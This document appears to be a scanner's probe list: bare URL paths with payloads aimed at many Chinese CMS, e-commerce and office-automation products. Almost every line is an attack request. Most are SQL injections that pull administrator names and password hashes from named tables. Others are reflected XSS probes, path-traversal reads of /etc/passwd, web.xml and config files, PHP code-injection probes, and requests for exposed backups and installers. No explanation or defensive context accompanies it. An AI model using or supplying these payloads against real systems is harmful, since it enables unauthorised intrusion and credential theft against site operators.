/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
